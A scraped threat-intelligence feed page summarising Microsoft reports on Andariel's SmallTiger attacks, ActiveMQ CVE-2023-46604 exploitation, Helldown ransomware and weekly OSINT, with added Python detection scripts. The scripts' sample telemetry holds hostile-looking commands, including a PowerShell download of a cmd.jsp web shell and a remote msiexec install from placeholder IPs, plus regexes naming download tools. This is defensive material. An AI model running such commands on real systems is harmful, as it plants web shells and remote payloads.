Last one
Src |
Date (GMT) |
Title |
Description |
Tags |
Stories |
Notes |
 |
2024-12-30 19:16:07 |
Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) (direct link) |
## Snapshot
ASEC reports that the Andariel threat group has resumed attacks to distribute SmallTiger malware, targeting Korean software solutions, including asset management and document management tools.
## Description
ASEC reports that the Andariel group (tracked by Microsoft as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) exploits vulnerabilities in asset management solutions to gain control over systems. Most of these attacks resulted in the installation of ModeLoader. In one case, the attackers used [brute-force](https://security.microsoft.com/threatanalytics3/d44f2c6d-6901-4967-82b7-7ffe4f7276e7/overview) and dictionary attacks on exposed update servers to replace update programs with malicious versions, enabling them to distribute SmallTiger. In recent cases, researchers have found SmallTiger in the installation paths of asset management solutions alongside a keylogger. This keylogger stored captured keystrokes in the temporary file "MsMpLog.tmp." The attackers also configured infected systems for future Remote Desktop Protocol (RDP) access. Additionally, they deployed an open-source tool called CreateHiddenAccount to add and conceal a backdoor account.
The group also targets document management solutions by exploiting outdated Apache Tomcat web servers. After gaining initial access, the attackers query system information and install Advanced Port Scanner. They then install a web shell via PowerShell commands; the server the web shell was downloaded from was also identified as the command-and-control address for SmallTiger.
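The host and Tomcat indicators ASEC describes above (an account added and hidden with CreateHiddenAccount, Remote Desktop switched on, the MsMpLog.tmp keystroke file, and a PowerShell download spawned under Tomcat) can be hunted for in endpoint telemetry. The following Python is an added example written for this page, not ASEC's or Microsoft's code: the event schema (event_id, image, command_line and similar field names), the "$"-suffix naming convention assumed for CreateHiddenAccount's account, and the sample records are all assumptions, and the records are constructed rather than real logs.

```python
"""Hunt for the SmallTiger post-exploitation traces described above.

Added example for this page; not ASEC's or Microsoft's code. The records are
constructed telemetry, and the field names (event_id, image, command_line, ...)
are an assumed normalisation, not any product's real schema.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

Finding = Tuple[str, str, str]  # (rule name, host, detail)

@dataclass
class Event:
    event_id: int                     # 4720/4688 (Security log) or 1/11/13 (Sysmon), assumed
    host: str
    f: Dict[str, str] = field(default_factory=dict)

DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer",
    re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
KEYLOG_FILE = re.compile(r"(^|\\)msmplog\.tmp$", re.IGNORECASE)   # keystroke store named in the report
RDP_DENY_VALUE = re.compile(r"\\Terminal Server\\fDenyTSConnections$", re.IGNORECASE)

def hidden_account_created(e: Event) -> List[Finding]:
    # 4720 = user account created. CreateHiddenAccount conventionally names its
    # account "<name>$" (assumption drawn from the tool, not from the report); a '$'
    # suffix on a human user account is rare enough to review every time.
    user = e.f.get("target_user", "")
    if e.event_id == 4720 and user.endswith("$"):
        return [("hidden_account", e.host, user)]
    return []

def rdp_enabled(e: Event) -> List[Finding]:
    # Sysmon 13 (registry value set): fDenyTSConnections written as 0 turns Remote Desktop on.
    if e.event_id != 13 or not RDP_DENY_VALUE.search(e.f.get("target_object", "")):
        return []
    m = re.search(r"0x([0-9a-fA-F]+)", e.f.get("details", ""))
    if m and int(m.group(1), 16) == 0:
        return [("rdp_enabled", e.host, e.f["target_object"])]
    return []

def keylogger_artifact(e: Event) -> List[Finding]:
    # Sysmon 11 (file create): the keylogger's temporary output file.
    name = e.f.get("target_filename", "")
    if e.event_id == 11 and KEYLOG_FILE.search(name):
        return [("keylog_file", e.host, name)]
    return []

def webshell_download(e: Event) -> List[Finding]:
    # 4688 / Sysmon 1 (process create): a PowerShell download cradle whose parent is
    # Tomcat's Java process, matching the web shell install step in the report.
    if e.event_id not in (1, 4688):
        return []
    image = e.f.get("image", "").lower()
    parent = e.f.get("parent_command_line", "").lower()
    cmd = e.f.get("command_line", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    if not any(k in parent for k in ("tomcat", "catalina")):
        return []
    if not DOWNLOAD_CRADLE.search(cmd):
        return []
    urls = URL.findall(cmd)
    return [("tomcat_powershell_download", e.host, u) for u in urls] or \
           [("tomcat_powershell_download", e.host, cmd)]

RULES = (hidden_account_created, rdp_enabled, keylogger_artifact, webshell_download)

def hunt(events: List[Event]) -> List[Finding]:
    return [hit for e in events for rule in RULES for hit in rule(e)]

def candidate_c2(findings: List[Finding]) -> Set[str]:
    """Download hosts from the Tomcat rule: the report says the same server was
    SmallTiger's C2, so these go straight to the block list."""
    return {d for rule, _, d in findings if rule == "tomcat_powershell_download" and d.startswith("http")}

# Constructed sample telemetry (not real logs; 198.51.100.0/24 is a documentation range).
SAMPLE = [
    Event(4720, "DMS01", {"target_user": "support$"}),
    Event(4720, "DMS01", {"target_user": "jdoe"}),
    Event(13, "AM02", {"target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
                       "details": "DWORD (0x00000000)"}),
    Event(13, "AM02", {"target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
                       "details": "DWORD (0x00000001)"}),
    Event(11, "AM02", {"target_filename": r"C:\Windows\Temp\MsMpLog.tmp"}),
    Event(1, "DMS01", {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "command_line": "powershell -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.23/cmd.jsp','C:\\tomcat\\webapps\\ROOT\\cmd.jsp')",
                       "parent_command_line": r"C:\Program Files\Java\jre\bin\java.exe -Dcatalina.home=C:\tomcat org.apache.catalina.startup.Bootstrap"}),
    Event(1, "DMS01", {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "command_line": r"powershell -File C:\scripts\backup.ps1",
                       "parent_command_line": r"C:\Windows\explorer.exe"}),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE):
        print(hit)
    print("candidate C2:", candidate_c2(hunt(SAMPLE)))
```

The Tomcat rule keys on the parent process rather than on the download URL, so it still fires when the attacker changes hosting; the URL it extracts is what you feed into egress blocking, since the report ties that same server to SmallTiger's C2.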
## Microsoft Analysis and Additional OSINT Context
[Microsoft researchers determined](https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/) that SmallTiger is a C++ backdoor with layered obfuscation, seen in the wild packed with Themida or VMProtect. [In February 2024](https://asec.ahnlab.com/ko/73907/), ASEC first identified SmallTiger targeting South Korean defense and manufacturing organizations. Subsequently, in May 2024, Microsoft observed Onyx Sleet conducting attacks using SmallTiger, specifically targeting South Korean defense organizations. Onyx Sleet is a North Korea-affiliated activity group that conducts cyber espionage through numerous campaigns with the goal of intelligence gathering and financial gain. The threat actor uses a wide range of custom tools and malware while maintaining a consistent attack chain, especially against organizations of interest to North Korean intelligence, such as those in the defense, engineering, and energy sectors.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Maintain good [cyber hygiene](https://www.microsoft.com/en-us/microsoft-365-life-hacks/privacy-and-safety/cyber-hygiene) and follow online safety best practices to help prevent keylogging.
- Install antivirus software. Many antivirus products now include anti-keylogger and anti-spyware protection, which can help identify and block keylogging malware. Installing and keeping antivirus software up to date helps prevent data theft.
- Regularly update security settings, and if a device is no longer receiving updates, strongly consider replacing it with a new device.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Avoid downloading files from unsafe websites or clicking links in an email from an unknown sender. Phishing has become more sophisticated, so you should be cautious of clicking links or downloading attachments from peopl |
Malware
Tool
Vulnerability
Threat
|
APT 45
|
★★
|
 |
2024-12-09 12:22:03 |
Weekly OSINT Highlights, 9 December 2024 (direct link) |
## Snapshot
Last week's OSINT reporting highlights a diverse range of cyber threats spanning ransomware, espionage, supply chain attacks, and disinformation campaigns. Espionage activity remains prominent, with Chinese and Russian actors targeting organizations for geopolitical and industrial intelligence. Key trends include the exploitation of vulnerabilities in widely used software, such as Apache ActiveMQ (CVE-2023-46604) and Docker APIs, and advanced malware like SmokeLoader and MOONSHINE to target industries ranging from manufacturing to financial services. Ransomware groups, including Howling Scorpius and Venom Spider, leverage sophisticated techniques like double extortion and hybrid encryption, focusing on SMBs and enterprises. Targets span global industries, including sensitive infrastructure, while attack vectors predominantly involve phishing, misconfigured systems, and supply chain manipulation, underscoring the adaptability and persistence of modern threat actors.
## Description
1. [Manufacturing Sector Cyberattack](https://sip.security.microsoft.com/intel-explorer/articles/d976ecc3): Cyble Research and Intelligence Labs uncovered a campaign targeting the manufacturing sector with malicious LNK files masquerading as PDFs. The attack employs LOLBins, DLL sideloading, and advanced obfuscation techniques, using tools like Lumma stealer and Amadey bot to exfiltrate data and establish persistence.
2. [Phishing Malware Impersonating the National Tax Service (NTS)](https://sip.security.microsoft.com/intel-explorer/articles/6542e5a4): AhnLab has observed a significant increase in phishing emails impersonating the National Tax Service (NTS), particularly during tax filing periods. These phishing attempts involve emails with manipulated sender addresses to appear as if they are from the NTS, and they contain malicious attachments in various formats or hyperlinks leading to malware-hosting websites and the ultimate deployment of XWorm malware.
3. [Solana Web3.js library backdoored to steal secret, private keys](https://sip.security.microsoft.com/intel-explorer/articles/04dd6cf6): Socket security firm reported that versions 1.95.6 and 1.95.7 of the Solana Web3.js library contained code designed to exfiltrate private and secret keys, which could allow attackers to drain funds from wallets. The attack is believed to be the result of a social engineering/phishing attack targeting maintainers of the official Web3.js open-source library maintained by Solana.
4. [Exploitation of CVE-2023-46604 in Korea](https://sip.security.microsoft.com/intel-explorer/articles/ccb7bd15): AhnLab identified active exploitation of Apache ActiveMQ vulnerability CVE-2023-46604, enabling remote code execution on unpatched Korean systems. Threat actors, including Andariel and Mauri ransomware groups, used tools like Quasar RAT and AnyDesk to exfiltrate data and control compromised environments.
5. [China-Linked Espionage on U.S.-China Organization](https://sip.security.microsoft.com/intel-explorer/articles/9c09d15e): Symantec reported a four-month-long intrusion by suspected Chinese threat actors targeting a U.S. organization with a Chinese presence. The attackers used DLL sideloading, Impacket, and credential-dumping tactics to exfiltrate data, leveraging tools like FileZilla and PSCP for intelligence gathering.
6. [Earth Minotaur's MOONSHINE Campaign](https://sip.security.microsoft.com/intel-explorer/articles/699406a4): Trend Micro detailed Earth Minotaur's use of the MOONSHINE exploit kit to target vulnerabilities in Android apps like WeChat, delivering the DarkNimbus backdoor. The campaign, likely linked to Chinese actors, focuses on Uyghur and Tibetan communities, employing phishing and Chromium browser exploits to monitor devices.
7. [Vulnerabilities in RAG Systems](https://sip.security.microsoft.com/intel-explorer/articles/53083f3e): Trend Micro exposed critical vulnerabilities in Retrieval-Augmented Generation (RAG) systems, including vector stores and LLM hosting platforms like l |
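The Solana Web3.js item above gives two exact release numbers, which is the useful shape for a supply-chain check: rather than trusting the version pinned in package.json, walk the lockfile, where transitive copies live. The Python below is an added example for this page, not Socket's or Solana's code. The two lockfiles are constructed, the affected version set is the one the report gives, and the install-path strings follow npm's lockfile layout (v1 nested "dependencies" tree, v2/v3 flat "packages" map).

```python
"""Check an npm lockfile for the backdoored @solana/web3.js releases named above.

Added example for this page, not Socket's or Solana's code. The two lockfiles below
are constructed; the affected version set is the one the report gives.
"""
import json
from typing import Dict, Iterator, List, Set, Tuple

# package name -> versions reported to contain the key-exfiltration code
BACKDOORED: Dict[str, Set[str]] = {"@solana/web3.js": {"1.95.6", "1.95.7"}}

Entry = Tuple[str, str, str]  # (package name, version, install path)

def _walk_v1(deps: Dict[str, dict], prefix: str) -> Iterator[Entry]:
    # lockfileVersion 1: a nested "dependencies" tree
    for name, info in deps.items():
        path = f"{prefix}node_modules/{name}"
        yield name, info.get("version", ""), path
        yield from _walk_v1(info.get("dependencies", {}), path + "/")

def installed_packages(lock: dict) -> Iterator[Entry]:
    """Every installed package, whatever the lockfile version (v1 tree or v2/v3 flat map)."""
    if "packages" in lock:
        for path, info in lock["packages"].items():
            if not path:          # "" is the root project entry
                continue
            name = info.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, info.get("version", ""), path
    else:
        yield from _walk_v1(lock.get("dependencies", {}), "")

def find_backdoored(lock_json: str) -> List[Entry]:
    """Entries whose exact version is in BACKDOORED. Nested copies count too: a
    transitive dependency can pull the bad release in under a pinned good one."""
    lock = json.loads(lock_json)
    return [e for e in installed_packages(lock) if e[1] in BACKDOORED.get(e[0], set())]

# Constructed lockfiles (not from any real project).
LOCK_V3 = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "wallet-app", "version": "0.1.0"},
        "node_modules/@solana/web3.js": {"version": "1.95.7"},
        "node_modules/some-sdk": {"version": "2.0.0"},
        "node_modules/some-sdk/node_modules/@solana/web3.js": {"version": "1.95.5"},
    },
})
LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "@solana/web3.js": {"version": "1.95.8"},
        "some-sdk": {"version": "2.0.0",
                     "dependencies": {"@solana/web3.js": {"version": "1.95.6"}}},
    },
})

if __name__ == "__main__":
    for label, lock in (("v3", LOCK_V3), ("v1", LOCK_V1)):
        for name, version, path in find_backdoored(lock):
            print(f"{label}: {name}@{version} at {path}")
```

Run it against a real tree with `find_backdoored(open("package-lock.json").read())`; yarn and pnpm lockfiles use different layouts and are not covered here. Matching on exact versions is deliberate: a range check would also flag the clean releases on either side.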
Ransomware
Malware
Tool
Vulnerability
Threat
Mobile
Industrial
Prediction
|
APT 45
|
★★★
|
 |
2024-12-06 16:17:50 |
Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604) (direct link) |
## Snapshot
Researchers at AhnLab Security Intelligence Response Center (ASEC) have identified that the [CVE-2023-46604](https://security.microsoft.com/intel-profiles/CVE-2023-46604) vulnerability in Apache ActiveMQ servers is being exploited on Korean systems. The vulnerability allows remote code execution by manipulating serialized class types in the OpenWire protocol.
## Description
The vulnerability began to be actively exploited soon after its disclosure, with incidents linked to the Andariel group and [HelloKitty](https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/) ransomware. The targeting of unpatched systems has been continuous, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments.
Recently, ASEC has observed evidence that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate information and gain control over systems through remote desktop. While no Mauri ransomware attacks have been confirmed, ASEC notes that Mauri ransomware has been uploaded to the download server.
## Microsoft Analysis and Additional OSINT Context
Microsoft Threat Intelligence has identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited CVE-2023-46604 to deliver and launch malicious MSI binaries using msiexec.exe. The actor then tampered with system services and launched the ransomware.
Microsoft has also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method was not confirmed.
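Two checks fall directly out of the text above and the recommendations that follow: whether a broker's version predates the fixed releases on its branch, and whether the ActiveMQ Java process has ever spawned msiexec.exe with a remote package, the delivery step Microsoft observed. The Python below is an added example for this page, not Apache's, AhnLab's or Microsoft's code; the fixed-version table is taken from the recommendations, the process records are constructed, and their field names are an assumed normalisation.

```python
"""CVE-2023-46604 triage helpers for ActiveMQ: a version check against the fixed
releases listed in the recommendations, and a process-telemetry rule for the
msiexec.exe delivery pattern described above.

Added example for this page, not Apache's, AhnLab's or Microsoft's code. The
process records are constructed and their field names are assumed.
"""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Branch -> first fixed release (5.15.16, 5.16.7, 5.17.6, 5.18.3 per Apache).
FIXED: Dict[int, Version] = {15: (5, 15, 16), 16: (5, 16, 7), 17: (5, 17, 6), 18: (5, 18, 3)}

def parse_version(s: str) -> Optional[Version]:
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", s)   # tolerates suffixes such as "-SNAPSHOT"
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None

def is_vulnerable(version: str) -> bool:
    """True when the build predates the fix on its branch. Branches before 5.15
    received no fix and are treated as vulnerable; anything after the 5.18 branch
    (6.x and later) postdates the fix."""
    v = parse_version(version)
    if v is None:
        raise ValueError(f"cannot parse ActiveMQ version {version!r}")
    major, minor, _ = v
    if major < 5 or (major == 5 and minor < 15):
        return True
    if major == 5 and minor in FIXED:
        return v < FIXED[minor]
    return False

def msiexec_from_activemq(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Process-creation records where msiexec.exe is a child of the ActiveMQ Java
    process and installs a package from a URL: the post-exploitation step Microsoft
    observed. A message broker has no business spawning an installer, so any hit
    deserves a look even if the URL is unfamiliar."""
    hits = []
    for ev in events:
        child = ev.get("image", "").lower()
        parent_img = ev.get("parent_image", "").lower()
        parent_cmd = ev.get("parent_command_line", "").lower()
        if not child.endswith("\\msiexec.exe"):
            continue
        if not (parent_img.endswith("\\java.exe") and "activemq" in parent_cmd):
            continue
        if re.search(r"https?://", ev.get("command_line", ""), re.IGNORECASE):
            hits.append(ev)
    return hits

# Constructed sample records (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i http://203.0.113.5/update.msi",
     "parent_image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "parent_command_line": r"java -Dactivemq.home=C:\activemq org.apache.activemq.console.Main start"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /q /i C:\Deploy\7z.msi",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_command_line": "svchost.exe -k netsvcs"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c whoami",
     "parent_image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "parent_command_line": r"java -Dactivemq.home=C:\activemq org.apache.activemq.console.Main start"},
]

if __name__ == "__main__":
    for ver in ("5.15.15", "5.16.7", "5.18.2", "5.18.3", "6.0.1"):
        print(ver, "vulnerable" if is_vulnerable(ver) else "fixed")
    for hit in msiexec_from_activemq(SAMPLE_EVENTS):
        print("suspicious:", hit["command_line"])
```

The third sample record (cmd.exe under the broker) is left unflagged on purpose: it is a narrower rule for the msiexec pattern the report names, and a broader "any child of the ActiveMQ process" rule would be the next thing to add once the noise level on a given host is known.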
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Due to active attacks in the wild and the availability of exploitation details, organizations should upgrade affected servers immediately. According to Apache, upgrade ActiveMQ servers to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address this issue.
- Review logs and alerts for any indications of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Upgrading ActiveMQ will not remediate any attacker artifacts.
- If evidence of exploitation is discovered, reset the credentials for accounts that have been used on the server, or have logged onto the server. Any service accounts related to ActiveMQ should also have their credentials rotated.
- Harden servers by following Apache\'s [ActiveMQ security recommendations](https://activemq.apache.org/security). Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication.
- Refer to our threat overview on [human-operated ransomware](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport?ocid=magicti_ta_ta2) for recommendations on security hardening and monitoring to defend against ransomware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run Endpoint Detection and Response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-b |
Ransomware
Tool
Vulnerability
Threat
|
APT 45
|
★★
|
 |
2024-11-22 21:45:45 |
Helldown Ransomware: An Overview of this Emerging Threat (direct link) |
## Snapshot
Researchers at Sekoia have reported with medium confidence that the 'Helldown' ransomware operation is exploiting vulnerabilities in Zyxel firewalls to infiltrate corporate networks.
## Description
Helldown, which was first documented in August 2024, has been growing rapidly, listing numerous victims on its data extortion portal. The ransomware has a Linux variant that targets VMware files, with capabilities to list and kill VMs to encrypt images, though it appears to be under development. Helldown for Windows is believed to be based on the leaked LockBit 3 builder and shows operational similarities to Darkrace and Donex, but no definitive connection has been established.
Helldown is not particularly selective in the data it steals, publishing large data packs on its website, with one instance reaching up to 431GB. The ransomware uses a random victim string as the extension for encrypted files and includes this string in the ransom note's filename. Sekoia's investigation suggests that Helldown may be using CVE-2024-42057, a command injection vulnerability in Zyxel firewalls' IPSec VPN, to execute OS commands and establish a foothold in networks. The attackers reportedly use a malicious account to access domain controllers, move laterally, and disable endpoint defenses. Payloads connected to the Zyxel compromise were uploaded to VirusTotal from Russia, indicating the possibility of private n-day exploit usage. As of the latest reports, 31 victims have been listed on Helldown's extortion portal, primarily small and medium-sized firms in the United States and Europe.
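The naming behaviour described above (a per-victim random string used as the encrypted-file extension and repeated in the ransom note's filename) gives a responder a quick triage heuristic for a file listing pulled from a share or backup snapshot. The Python below is an added example for this page, not Sekoia's or Microsoft's code. The listing and the victim string "k1f9x7" are constructed, the thresholds are tuning choices, and the exact shape of the note filename is an assumption beyond what the report states.

```python
"""Triage a file listing for the Helldown naming pattern described above: many
files sharing one unfamiliar extension (the per-victim string) plus a ransom note
whose filename carries that same string.

Added example for this page, not Sekoia's or Microsoft's code. The listing is
constructed; the exact note filename shape is an assumption beyond what the report states.
"""
from collections import Counter
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List, Optional

# Extensions expected to be numerous on a file server; never treated as a victim string.
COMMON_EXTS = {"txt", "doc", "docx", "xls", "xlsx", "pptx", "pdf", "jpg", "png",
               "exe", "dll", "log", "ini", "db", "bak", "zip", "vmdk", "vmx"}

def extension(name: str) -> str:
    return PureWindowsPath(name).suffix.lstrip(".").lower()

def suspect_extension(names: Iterable[str], min_files: int = 5, min_share: float = 0.5) -> Optional[str]:
    """Return the dominant uncommon extension, or None if nothing stands out.
    Both thresholds are tuning knobs: a handful of odd files is noise, but an
    unknown extension on half the listing is not."""
    counts = Counter(ext for ext in map(extension, names) if ext)
    total = sum(counts.values())
    for ext, n in counts.most_common():
        if ext in COMMON_EXTS:
            continue
        return ext if n >= min_files and n / total >= min_share else None
    return None

def find_notes(names: Iterable[str], victim_string: str) -> List[str]:
    """Files that carry the victim string in their name without being encrypted
    with it as extension: the ransom note(s)."""
    return [n for n in names
            if victim_string in PureWindowsPath(n).name.lower() and extension(n) != victim_string]

def triage(names: List[str]) -> Dict[str, object]:
    ext = suspect_extension(names)
    if ext is None:
        return {"suspect": False}
    encrypted = [n for n in names if extension(n) == ext]
    return {"suspect": True, "victim_string": ext, "encrypted": encrypted, "notes": find_notes(names, ext)}

# Constructed listing: 12 encrypted files, a few untouched ones and one note.
# "k1f9x7" is a made-up victim string, not one seen in the wild.
SAMPLE_LISTING = [rf"\\fs01\finance\Q{q}_{doc}.k1f9x7"
                  for q in (1, 2, 3, 4) for doc in ("report.docx", "budget.xlsx", "board.pdf")]
SAMPLE_LISTING += [r"\\fs01\finance\archive.zip", r"\\fs01\finance\notes.txt",
                   r"\\fs01\finance\Readme.k1f9x7.txt", r"\\fs01\finance\Thumbs.db"]
CLEAN_LISTING = [r"C:\data\a.docx", r"C:\data\b.xlsx", r"C:\data\c.pdf", r"C:\data\odd.custom"]

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
    print(triage(CLEAN_LISTING))
```

Because the extension is random per victim, a static extension list would never match Helldown; the heuristic instead keys on the structure of the naming scheme, and the recovered victim string doubles as a search term for the note across other hosts.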
## Recommendations
Microsoft recommends the following mitigations to defend against this threat:
- Keep software up to date. Apply new security patches as soon as possible.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains.
- Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening.
Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used in ransomware intrusions such as Helldown:
- [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-a |
Ransomware
Malware
Tool
Vulnerability
Threat
|
APT 45
|
★★
|
 |
2024-10-07 16:54:11 |
Weekly OSINT Highlights, 7 October 2024 (direct link) |
## Snapshot
Last week's OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker's subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative AI services such as AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services.
## Description
1. [Golden Chickens' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538).
2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence.
3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques.
4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration.
5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems.
6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim's network.
7. [Gorilla Botnet\'s DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth.
8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK's NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns.
9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame |
Ransomware
Malware
Tool
Vulnerability
Threat
Mobile
Prediction
Cloud
|
APT 37
APT 45
|
★★
|
|